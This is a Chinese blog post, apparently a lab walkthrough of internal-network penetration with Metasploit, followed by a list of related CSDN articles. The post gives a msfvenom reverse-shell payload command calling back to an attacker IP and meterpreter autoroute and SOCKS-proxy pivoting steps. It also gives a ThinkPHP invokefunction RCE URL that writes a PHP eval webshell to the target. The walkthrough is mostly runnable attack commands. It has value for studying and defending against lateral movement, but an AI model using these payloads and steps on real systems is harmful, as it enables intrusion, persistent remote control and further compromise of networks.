MSF内网渗透

最新推荐文章于 2024-02-21 15:17:44 发布
最新推荐文章于 2024-02-21 15:17:44 发布
阅读量491 收藏 1
点赞数 1
文章标签: 服务器 安全 linux Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_63124284/article/details/128857757
版权

环境搭建

windows server 2008 :asp站点 双网卡 192.168.5.24 -10.10.10.8
win7 :内网主机 开放80web服务 使用thinkphp搭建 10.10.10.9
kali:攻击机 192.168.5.51

目标 : 拿下两台主机的权限

复现步骤

  1. (省略搭建站点步骤)给win2008添加一张网卡 保证可以与内网主机win7相互通信 kali访问asp站点

  1. getshell后(省略getshell步骤直接演示内网渗透)反弹到msf进行内网渗透

  1. msf设置好监听 生成反向木马 上传到webshell并运行

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.5.51 LPORT=8001 -f exe -o /tmp/lssam.exe

  1. 拿到的会话是低权限账户 利用烂土豆进行提权

  1. 查看上线主机内网路由 我们先获取目标内网相关信息,可以看到该主机上的网卡有两个网段

run get_local_subnets

  1. 添加这边模拟的10网段的内网路由

run autoroute -s 10.10.10.0/24 # 添加到达10.10.10.0网段的路由
run autoroute -p # 打印路由信息

  1. 添加好路由了 , 紧接着使用msf扫描一下内网存活的主机(这里略过扫描时间太长...)此时只是把msf整个工具拖到了10内网中 , 但是kali机器上的其他工具是无法访问到10段的 ,我们可以使用socks_proxy解决这个问题。

background
use auxiliary/server/socks_proxy
show options
run

  1. 修改kali的/etc/proxychains4.conf文件

vim /etc/proxychains4.conf
socks5 127.0.0.1 1080

  1. 使用代理打开火狐浏览器 访问win7站点测试

  1. 存在rce nday , 直接使用payload打

  1. 写入一句话 蚁剑链接

http://10.10.10.9/index.php/?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo "<?php @eval(\$_POST[888]);?>" > cm.php

恸.283
关注
【网络安全MSF内网渗透
你在看屏幕的同时,屏幕也在注视着你
06-04 2993
内网渗透超级强悍
47-4 内网渗透 - MSF介绍
最新发布
weixin_43263566的博客
06-15 221
Metasploit框架(Metasploit Framework, MSF)是一款开源工具,专为渗透测试设计。它由Ruby编程语言编写,具有高度的扩展性,可以方便渗透测试人员开发和使用定制化的工具模板。Metasploit提供多种接口来控制测试过程,包括控制台、Web界面和命令行界面(CLI)。推荐使用控制台接口,因为它可以访问和使用所有Metasploit的插件,如Payload、漏洞利用模块、后渗透模块等。
MSF+内网穿透 实现远控
yxngu
05-09 1万+
网络攻防如同打仗 知己知彼百战不殆 要想学会防守必先知道敌人如何进攻 此教程的远端测试全是我的好友帮助测试 并非实际攻击!!! 写一篇远程的渗透教程给大家 当然不是为了教大家去黑别人电脑 而是让大家明白原理,懂得如何防范,再三强调!!! 使用此教程用在不正当地方造成的后果与本人无关!!! 接下来开始本次教程 先给大家展示一下效果吧!基于此程序可以监视对方电脑,实时屏幕抓取,甚至实时屏幕监测,还有创...
msf添加路由及socks代理进行内网穿透
2301_76227305的博客
02-21 2354
前面发过一篇cs开启socks代理实现内网穿透的,今天写一下msf添加socks代理实现内网访问以上的操作都是基于我们已经熟悉了其内网的环境,但在现实中往往要进行大量的内网信息收集工作。最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。
内网安全内网穿透详解
热门推荐
qq_61553520的博客
06-12 2万+
区别于代理技术,隧道技术,三种技术都有解决通讯的问题,但是侧重不一样代理技术可以把外网攻击机带进内网进行渗透隧道技术解决了因为防火墙限制流量不出网的问题内网穿透解决和内网主机建立连接的问题,可以远程访问内网的服务器要根据不同使用场景来选择使用。
MSF内网穿透
weixin_46686336的博客
11-08 536
MSF内网穿透
搭建内网靶场并用MSF进行内网穿透/渗透实验
Cwillchris的博客
10-17 4123
实验名称:利用MSF打穿内网 实验人:XX 实验日期:2021.10.16 实验目的:利用MSF进行内网渗透 实验拓扑: 实验环境: 所用机器 网络类型 IP 默认网关 DNS 攻击机:kali NAT 172.16.12.30/24 172.16.12.2 114.114.114.114
msf内网渗透
10-29
msf内网渗透
MSF多层内网渗透全过程
include_voidmain的博客
08-16 2329
MSF多层内网渗透全过程
frp对msf的shell的一个内网穿透
aicsswo的博客
11-08 1082
/frps -c frps.ini#后台运行nohup /root/frp/frps -c /root/frp/frps.ini &#结束pkill frps。如果输出的是其他的,则在文件列表中找 linux 的对应架构的压缩包。这里设置[common] 和 [mdf] 就可以用了 server_addr就是你的云服务器ip,token就是前面你设置的,其他照抄就行。.打开你的云服务器,随便你通过什么管理你的云服务器(ssh好还是其他软件能进行就ko)然后进入解压好的目录问文件:(cd命令进入)
MSF内网渗透实战
hackzkaq的博客
05-17 3982
零基础学黑客,搜索公众号:白帽子左一 作者:掌控安全-小熊保安 本来还是想用cobalt strike,但是由于某些原因,暂时关闭了cobalt strike的服务器,正好用msf尝试做一次内网渗透熟悉熟悉,注:最初用蚁剑看了一下,此次目标主机没开杀软,所以以下内容不涉及免杀. 一、MSF生成木马上线目标 1. 生成木马 使用命令: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=XXX.XXX.XXX.XX LPORT=4444 -f ex
0x15.第十五课 MetaSploit实现内网存活telnet和http服务扫描.pdf
06-24
0x15.第十五课 MetaSploit实现内网存活telnet和http服务扫描.pdf
三层网络靶场搭建&MSF内网渗透
2301_77147728的博客
03-23 436
在最近的CTF比赛中,综合靶场出现的次数越来越多,这种形式的靶场和真实的内网渗透很像,很贴合实际工作,但我们往往缺少多层网络的练习环境。本文通过VMware搭建3层网络,并通过msf进行内网渗透,涉及代理搭建,流量转发,端口映射等常见内网渗透技术。
内网渗透 Metasploit(MSF)基础使用
qq_49433473的博客
10-24 1万+
内网渗透 Metasploit(MSF)使用,信息搜集,模块详解,端口扫描,反弹shell
利用msf进行内网的木马渗透详细教程
m0_52332592的博客
11-11 4279
内网渗透木马测试
内网渗透工具MSF使用教程
CC__Faker的博客
04-01 2739
MSF介绍 Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。 常见指令 use[exploits/payloads/auxiliary] //指定一个模块并使其开始工作 show[exploits/payloads/auxiliary/options] //显
MFS 服务扫描与爆破
weixin_30585437的博客
03-20 364
MSF 服务发现 常用来发现局域网内,的常见服务,比如HTTP,FTP,TELNET等. MSF模块搜索: [root@localhost ~]# msfconsole msf5 > search scanner type:auxiliary msf5 > search scanner/http type:auxiliary // 搜索所有与HTTP相关的模块 发现HTT...
【转载】metasploit在内网渗透中的一些模块
weixin_30730151的博客
12-02 450
下面附上内网渗透中可能用得上的msf模块 scanner/portscan/syn SYN端口扫描scanner/portscan/tcp TCP端口扫描 auxiliary/scanner/smb/smb_login SMB登录测试扫描use windows/smb/psexec ...
MSF渗透测试实战指南:从信息收集到漏洞利用
例如,优先扫描已知存在溢出漏洞的高危端口,如22(SSH)、445(SMB)、3389(RDP)等,一旦发现可利用的漏洞,就可以进一步尝试权限提升和内网渗透。 在进行渗透测试时,必须遵循道德规范和法律法规,确保测试行为...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值